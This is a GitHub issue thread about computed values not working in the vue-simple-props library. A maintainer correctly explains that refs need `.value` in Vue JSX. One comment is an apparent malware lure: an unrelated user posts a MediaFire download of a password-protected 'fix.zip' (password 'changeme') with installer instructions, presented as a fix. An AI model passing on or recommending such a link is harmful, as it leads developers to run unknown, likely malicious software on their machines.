### ISSUE TITLE
Computed not working

### ISSUE THREAD

**Issue by erwinheldy** [sxzz/vue-simple-props#55]
### Describe the bug

As the title says

### Reproduction

https://stackblitz.com/edit/vitejs-vite-teq93f?file=src%2FApp.tsx

### System Info

```Shell
System:
    OS: Linux 6.1 Debian GNU/Linux 12 (bookworm) 12 (bookworm)
    CPU: (4) x64 Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz
    Memory: 1.11 GB / 7.66 GB
    Container: Yes
    Shell: 5.2.15 - /bin/bash
  Binaries:
    Node: 20.17.0 - /usr/bin/node
    Yarn: 1.22.22 - /usr/bin/yarn
    npm: 10.8.2 - /usr/bin/npm
    pnpm: 9.7.1 - /usr/bin/pnpm
    bun: 1.1.26 - /usr/bin/bun
  Browsers:
    Brave Browser: 128.1.69.153
    Chromium: 128.0.6613.84
```

### Used Package Manager

npm

### Validations

- [X] Follow our [Code of Conduct](https://github.com/sxzz/.github/blob/main/CODE_OF_CONDUCT.md)
- [X] Read the [Contributing Guide](https://github.com/sxzz/contribute).
- [X] Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
- [X] Check that this is a concrete bug. For Q&A, please open a GitHub Discussion instead.
- [X] The provided reproduction is a [minimal reproducible](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sxzz** [comment]
In Vue JSX, refs will not auto-unwrap, so `.value` is necessary.

```tsx
tsx: {state.count} * 2 = {doubled.value}
```
